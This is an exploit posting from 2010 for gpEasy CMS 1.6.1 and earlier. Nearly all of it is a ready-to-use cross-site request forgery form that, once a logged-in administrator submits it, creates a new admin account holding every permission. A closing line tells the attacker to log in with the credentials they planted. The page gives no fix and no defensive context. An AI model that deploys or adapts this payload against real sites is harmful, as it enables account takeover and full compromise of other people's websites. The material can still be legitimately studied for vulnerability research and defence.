============================================= gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit ============================================= Author : Giuseppe 'giudinvx' D'Inverno Email : <giudinvx[at]gmail[dot]com> Date : 04-29-2010 Site : http://www.giudinvx.altervista.org/ Location : Naples, Italy -------------------------------------------------------- Application Info Site : http://www.gpeasy.com/ Version: 1.6.1 -------------------------------------------------------- ==============[[ -Exploit Code- ]]============== <html> <form method="post" action="[patth]/index.php/Admin_Users"> <input type="text" value="xxx" name="username"><br/> <input type="password" value="xxx" name="password"><br/> <input type="password" value="xxx" name="password1"><br/> <input type="text" value="xxx" name="email"><br/> <input value="Admin_Menu" type="hidden" name="grant[]"> <input value="Admin_Uploaded" type="hidden" name="grant[]"> <input value="Admin_Extra" type="hidden" name="grant[]"> <input value="Admin_Theme" type="hidden" name="grant[]"> <input value="Admin_Users" type="hidden" name="grant[]"> <input value="Admin_Configuration" type="hidden" name="grant[]"> <input value="Admin_Trash" type="hidden" name="grant[]"> <input value="Admin_Uninstall" type="hidden" name="grant[]"> <input value="Admin_Addons" type="hidden" name="grant[]"> <input value="Admin_New" type="hidden" name="grant[]"> <input value="Admin_Theme_Content" type="hidden" name="grant[]"> <input type="hidden" value="newuser" name="cmd"> <input type="submit" value="Continue" name="aaa" class="submit"> </form> </html> # Now you have an Admin user with name: xxx and password: xxx, just login page [path]/index.php/Admin